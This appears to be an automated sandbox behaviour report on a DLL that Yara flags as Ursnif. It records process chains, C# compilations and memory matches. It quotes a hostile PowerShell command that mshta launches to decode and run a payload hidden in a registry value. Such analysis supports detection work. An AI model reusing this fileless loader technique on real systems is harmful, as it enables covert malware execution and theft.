Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\worVoBJYGD.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\worVoBJYGD.dll,Chartthird
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\worVoBJYGD.dll,Heavybaby
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\worVoBJYGD.dll,Right
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\worVoBJYGD.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\fedhsvoj\fedhsvoj.cmdline'
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESE546.tmp' 'c:\Users\user\AppData\Local\Temp\senxb4p4\CSCD728609DA3104BA4891CE07457BF77DE.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jqkof1ka\jqkof1ka.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vbpfsg54\vbpfsg54.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES419.tmp' 'c:\Users\user\AppData\Local\Temp\fedhsvoj\CSC2C7CB35724FE4D03B8B83A389D1E5FE.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCE3.tmp' 'c:\Users\user\AppData\Local\Temp\jqkof1ka\CSCA3035077FC7544A28C7D2FD8A94650.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES278F.tmp' 'c:\Users\user\AppData\Local\Temp\vbpfsg54\CSCC3210ABFD4B4742A7EBA7934EB0D0.TMP'
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: worVoBJYGD.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000017.00000002.429129001.000001ED7C9D0000.00000002.00000001.sdmp, csc.exe, 0000001D.00000002.443954090.000002400C710000.00000002.00000001.sdmp, csc.exe, 00000020.00000002.449751054.000001317AE50000.00000002.00000001.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\fedhsvoj\fedhsvoj.pdb source: powershell.exe, 00000013.00000002.561042649.0000020484316000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.436321416.0000000004EC0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.474646332.0000000005840000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.436321416.0000000004EC0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.474646332.0000000005840000.00000004.00000001.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.pdbXP source: powershell.exe, 00000013.00000002.561042649.0000020484316000.00000004.00000001.sdmp
Source:	Binary string: c:\922\exact-round\Example\horse\in.pdb source: loaddll32.exe, 00000000.00000002.504641313.000000006DDD0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.507786068.000000006DDD0000.00000002.00020000.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\fedhsvoj\fedhsvoj.pdbXP source: powershell.exe, 00000013.00000002.561042649.0000020484316000.00000004.00000001.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.pdb source: powershell.exe, 00000013.00000002.560986791.00000204842CD000.00000004.00000001.sdmp

Data Obfuscation:

Suspicious powershell command line found

Show sources

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\fedhsvoj\fedhsvoj.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jqkof1ka\jqkof1ka.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vbpfsg54\vbpfsg54.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\fedhsvoj\fedhsvoj.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jqkof1ka\jqkof1ka.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vbpfsg54\vbpfsg54.cmdline'

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6DD81D62 LoadLibraryA,GetProcAddress,

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DD82263 push ecx; ret
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DD82210 push ecx; ret
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0314528F push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00D97AB0 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00D97E1F push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00D9B1DE push esp; iretd
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05384EE0 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0538528F push ecx; ret
Source: C:\Windows\System32\control.exe	Code function: 30_2_0025C4ED push 3B000001h; retf

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\jqkof1ka\jqkof1ka.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\fedhsvoj\fedhsvoj.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\vbpfsg54\vbpfsg54.dll	Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000004.00000003.397556594.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374227278.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.434124521.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.534765366.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.434060838.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.397622522.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.397589601.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.451828519.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.434180314.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.433841942.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.451943735.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.434086354.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.433993641.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374321927.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.381487289.0000000003D4C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.400741331.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.406917672.0000000004DDC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.397430655.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374277769.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.451905542.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374345773.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374301760.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.459171611.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.397475800.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.451696004.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.397396701.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.434150338.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000000.543947285.000000000F1EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.434024374.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.377109820.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.433927552.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374368880.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.397343718.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.397511011.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374359544.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374253980.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 5780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4604, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 2224, type: MEMORYSTR

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
